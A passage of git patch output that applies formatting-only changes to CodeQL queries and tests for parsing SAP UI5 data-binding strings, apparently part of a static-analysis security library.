TBindingStringFromLiteral(stringLiteral) and result = stringLiteral.getLocation() @@ -221,10 +221,10 @@ private predicate earlyPropertyBinding( or // Composite binding https://ui5.sap.com/#/topic/a2fe8e763014477e87990ff50657a0d0 exists( - DataFlow::ObjectLiteralNode objectLiteral, - DataFlow::ObjectLiteralNode valueLiteral, DataFlow::PropWrite partWrite, - DataFlow::ArrayLiteralNode partsArray, DataFlow::ObjectLiteralNode partsElement, - DataFlow::PropWrite pathWrite, DataFlow::ValueNode pathValue + DataFlow::ObjectLiteralNode objectLiteral, DataFlow::ObjectLiteralNode valueLiteral, + DataFlow::PropWrite partWrite, DataFlow::ArrayLiteralNode partsArray, + DataFlow::ObjectLiteralNode partsElement, DataFlow::PropWrite pathWrite, + DataFlow::ValueNode pathValue | objectLiteral.getAPropertyWrite() = bindingTarget and bindingTarget.writes(_, "value", binding) and diff --git a/javascript/frameworks/ui5/test/lib/BindingStringParser/BindingStringParser.ql b/javascript/frameworks/ui5/test/lib/BindingStringParser/BindingStringParser.ql index 78c4f00da..10b9a5694 100644 --- a/javascript/frameworks/ui5/test/lib/BindingStringParser/BindingStringParser.ql +++ b/javascript/frameworks/ui5/test/lib/BindingStringParser/BindingStringParser.ql @@ -3,22 +3,14 @@ import advanced_security.javascript.frameworks.ui5.Bindings import advanced_security.javascript.frameworks.ui5.BindingStringParser as Make class BindingStringReader extends StringLiteral { - BindingStringReader() { - this.getValue().matches("{%}") - } + BindingStringReader() { this.getValue().matches("{%}") } - string getBindingString() { - result = this.getValue() - } - - DataFlow::Node getANode() { - result.asExpr() = this - } + string getBindingString() { result = this.getValue() } + + DataFlow::Node getANode() { result.asExpr() = this } } module BindingStringParser = Make::BindingStringParser; from BindingStringParser::Binding binding select binding - - From 33ba6eab12aa65e76f0ea327cd1846d943fa16dd Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 21:58:29 +0200 Subject: [PATCH 15/15] formatting --- javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql b/javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql index 830a6f21a..825ed3701 100644 --- a/javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql +++ b/javascript/frameworks/ui5/test/lib/Bindings/Bindings.ql @@ -1,4 +1,4 @@ import javascript import advanced_security.javascript.frameworks.ui5.Bindings -select any(Binding b) \ No newline at end of file +select any(Binding b)